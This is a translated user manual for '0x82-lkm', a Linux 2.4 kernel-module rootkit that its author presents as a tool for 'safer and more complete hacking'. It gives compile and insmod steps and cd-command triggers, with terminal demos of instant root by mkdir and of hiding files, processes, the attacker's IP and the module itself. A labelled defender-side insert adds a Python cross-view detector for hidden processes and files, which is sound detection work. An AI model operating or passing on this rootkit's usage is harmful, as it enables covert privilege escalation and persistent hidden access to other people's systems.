Linux LKM (Loadable Kernel Module) Backdoor for linux kernel v2.4.2

Rather than show off my poor English, I think it will be quicker to explain this simply in Korean. :-)

First of all, thank you(?) for using my LKM (Loadable Kernel Module). This tool was written for safer and more complete hacking. At present it has only a minimal set of functions, and the version is v0.2. I will go over the basic functions first and then explain how to use them.

The implemented functions are as follows.

=-=-=- Functions -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

0x01. SetUID zer0 Backd00r (make directory).
 -. Privilege escalation (uid=0) triggered by creating a specific directory

0x02. Directory hidden (directory not move).
 -. Hide an entire directory (the hidden directory cannot be entered)

0x03. File hidden (file not read).
 -. Hide a file (the specified file cannot be read)

0x04. ls command spoof (file & dir not view).
 -. Spoof the ls command (hides the specified files & directories)

0x05. ps command spoof (process not found).
 -. Spoof the ps command (hides the specified process)

0x06. w, netstat, finger, last, lastlog commands spoof (ip not found).
 -. Spoof the w, netstat, finger, last and lastlog commands (hides the IP)

0x07. hidden LKM Backdoor.
 -. Hide a specific loaded module (the specified module cannot be listed)

The functions above are marked with comments in the code. Next I will explain the usage.

=-=-=- Usages -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Compile:
bash-2.04# gcc -c 0x82-lkm.c

Install:
bash-2.04# insmod 0x82-lkm.o

Implemented attributes:
file - file
dir  - directory
proc - process
ip   - attacker IP
mod  - attacker module

The LKM is remote-controlled through the cd command:
bash-2.04# cd <identifier key>-<attribute>-<name to hide>
(For reference, the identifier key is x82 by default when compiled.)

- Privilege escalation (uid=0) by creating a specific directory -

bash-2.04$ id
uid=501(x82) gid=501(x82) groups=501(x82),10(wheel)
bash-2.04$ mkdir x82-dir
bash-2.04$ id
uid=0(root) gid=0(root) euid=501(x82) groups=501(x82),10(wheel)
bash-2.04$

The default setting is "x82-dir"; the directory name must be the name currently designated as the hidden directory.
- Changing the hidden directory name -

bash-2.04$ cd x82-dir-direct
bash: cd: x82: No such file or directory
bash-2.04$ id
uid=501(x82) gid=501(x82) groups=501(x82),10(wheel)
bash-2.04$ mkdir direct
bash-2.04$ id
uid=0(root) gid=0(root) euid=501(x82) groups=501(x82),10(wheel)
bash-2.04$

If you look closely above, you will see that "x82-dir-direct" was passed as the argument to the cd command. The argument is interpreted as follows.

x82-dir-direct: x82 (identifier key) - dir (attribute) - direct (name to hide)

- Hiding a file (the specified file cannot be read) -

As with directory hiding above, entering the identifier key, the attribute and the name to hide, in that order, hides files and directories.

bash-2.04$ touch testfile
bash-2.04$ ls -al testfile
-rw-rw-r--    1 x82      x82             0 Apr 14 23:54 testfile
bash-2.04$ cd x82-file-testfile
bash: cd: x82: No such file or directory
bash-2.04$ ls -al testfile
bash-2.04$ cat testfile
cat: testfile: No such file or directory
bash-2.04$

- Hiding a process -

Entering the identifier key, the attribute and the name to hide in the required form hides a process as follows.

bash-2.04$ ps
  PID TTY          TIME CMD
 8364 pts/1    00:00:00 login
 8442 pts/1    00:00:00 ps
bash-2.04$ cd x82-proc-login
bash: cd: x82: No such file or directory
bash-2.04$ ps
  PID TTY          TIME CMD
 8443 pts/1    00:00:00 ps
bash-2.04$

- Hiding the attacker's IP -

Entering the identifier key, the attribute and the IP to hide hides the IP as follows.

(Example) attacker's IP: 61.27.144.81

bash-2.04$ cd x82-ip-61.27.144.81
bash: cd: x82: No such file or directory
bash-2.04$ w
 12:11am  up 6 days,  6:46,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
x82      pts/1    ............     11:45pm  0.00s  0.09s  0.01s  w
bash-2.04$ lastlog
x82              pts/1    ............     XXX XXX 14 23:45:29 +0900 2002
bash-2.04$ last
x82      pts/1        ............     XXX XXX 14 23:45   still logged in
x82      pts/1        ............     XXX XXX 14 23:43 - 23:45  (00:02)
x82      pts/1        ............     XXX XXX 14 23:11 - 23:15  (00:03)

wtmp begins XXX XXX 14 23:11:29 2002
bash-2.04$

As shown above, the attacker's IP is displayed entirely as '.' (dots).
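The ls and ps spoofing shown above works by filtering what the directory listing returns, so an object hidden that way usually still answers a direct probe that does not go through readdir(). The cross-view check below is an added example written for this page from the defender's side; it is not part of 0x82-lkm, and its function names, the two-pass rule for processes and the sample names are the example's own assumptions.

```python
"""Cross-view detection for listing-based hiding (process and file).

Added example, not part of the 0x82-lkm package. A module that filters the
entries readdir() returns to ps or ls does not make the object itself go away,
so the defender compares the LISTED view (what readdir shows) with a PROBED
view obtained through a different system call and treats anything that answers
the probe but is missing from the listing as hidden.
"""
import os

PROC = "/proc"


def hidden_from_listing(listed, probed):
    """Pure comparison: objects that exist (probed) but are not enumerated (listed)."""
    return sorted(set(probed) - set(listed))


def listed_pids():
    """PIDs the way ps sees them: numeric entries returned by readdir('/proc')."""
    return {int(name) for name in os.listdir(PROC) if name.isdigit()}


def probe_pids(max_pid):
    """PIDs that exist according to kill(pid, 0), which bypasses readdir().

    ESRCH (ProcessLookupError) means no such process; EPERM (PermissionError)
    means the process exists but belongs to another user, so it is counted.
    """
    alive = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
            alive.add(pid)
        except ProcessLookupError:
            continue
        except PermissionError:
            alive.add(pid)
    return alive


def read_pid_max(default=32768):
    """Upper bound of the PID space; 32768 is the classic 2.4-era default (assumed)."""
    try:
        with open(os.path.join(PROC, "sys/kernel/pid_max")) as fh:
            return int(fh.read().strip())
    except OSError:
        return default


def hidden_pids(max_pid=None):
    """Report a PID only if it is alive-but-unlisted in two consecutive passes.

    Processes that start or exit between the listing and the probe show up in
    one pass only, so the second pass filters those transient false positives.
    """
    if not os.path.isdir(PROC):
        return []
    max_pid = max_pid or read_pid_max()
    first = hidden_from_listing(listed_pids(), probe_pids(max_pid))
    if not first:
        return []
    second = hidden_from_listing(listed_pids(), probe_pids(max_pid))
    return sorted(set(first) & set(second))


def hidden_files(directory, expected_names):
    """Names from a trusted baseline (package manifest, earlier inventory) that
    stat() still resolves but readdir() of the directory no longer returns."""
    listed = set(os.listdir(directory))
    present = []
    for name in expected_names:
        try:
            os.stat(os.path.join(directory, name))
            present.append(name)
        except FileNotFoundError:
            pass
    return hidden_from_listing(listed, present)


if __name__ == "__main__":
    print("hidden PIDs:", hidden_pids())
    # Constructed baseline for the demo; a real run uses a manifest taken from a clean host.
    print("hidden files in /etc:", hidden_files("/etc", ["passwd", "hosts", "fstab"]))
```

The stat()-based file check only catches the ls-spoof case (0x04). The "file" attribute (0x03) also makes cat report "No such file", i.e. the open/stat path is hooked as well, so for that variant the baseline has to be compared from outside the running kernel (a boot from clean media, or a read of the raw block device). Likewise a module hidden from lsmod (0x07) is not visible to anything that reads /proc/modules, so that check belongs in a trusted-boot or offline comparison rather than in a userland script.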
- Hiding a specific LKM module -

By default the module is set to hide 0x82-lkm itself. You can easily change this.

bash-2.04# /sbin/lsmod | grep 0x82-lkm
bash-2.04# /sbin/lsmod
Module                  Size  Used by
8139too                16512   1 (autoclean)
usb-uhci               20752   0 (unused)
usbcore                49728   1 [usb-uhci]
bash-2.04# cd x82-mod-usbcore
bash: cd: x82: No such file or directory
bash-2.04# /sbin/lsmod | grep usbcore
bash-2.04#

With this, even the LKM the attacker has planted can be hidden completely.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

These are the results of testing on Linux 7.1 with kernel 2.4.2. Since it has not been tested on every version, problems may occur. Please take care that the kernel does not go down. :-)

Author: Xpl017Elz in INetCop(c).
E-mail: szoahc@hotmail.com & xploit@hackermail.com
Home: http://x82.i21c.net